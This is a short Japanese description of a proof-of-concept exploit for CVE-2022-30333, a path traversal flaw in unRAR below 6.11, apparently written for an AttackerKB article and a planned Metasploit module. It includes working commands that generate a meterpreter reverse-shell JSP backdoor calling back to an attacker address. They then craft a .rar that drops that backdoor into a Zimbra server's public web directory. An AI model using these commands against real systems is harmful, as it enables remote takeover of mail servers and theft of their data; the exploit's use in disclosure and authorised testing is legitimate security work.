
CVE-2022-30333 の unRAR におけるパストラバーサル脆弱性の概念実証エクスプロイト。悪意のある .rar ファイルを生成し、任意の場所にペイロードを仕込みます。ペネトレーションテストのために Metasploit および msfvenom と連携します。
CVE-2022-30333 の概念実証 - unRAR バージョン 6.11 未満におけるパストラバーサル脆弱性です。AttackerKB の記事向けにエクスプロイトのデモとして作成し、近々 Metasploit モジュールに組み込む予定です。
基本的には、ターゲット(パストラバーサルを含む)とファイルデータを指定すると、そのファイルを指定された場所に展開する .rar ファイルを生成します。最大ファイル長は 104 バイト、最大ファイルサイズは 4096 バイトです。(これは脆弱性に固有の制限ではなく、ファイルを生成する際に私が設定した値です。)
例えば、msfvenom でバックドアを生成します。
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
次に、.jsp ファイルを特定の場所に仕込んだ .rar ファイルを作成します。
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar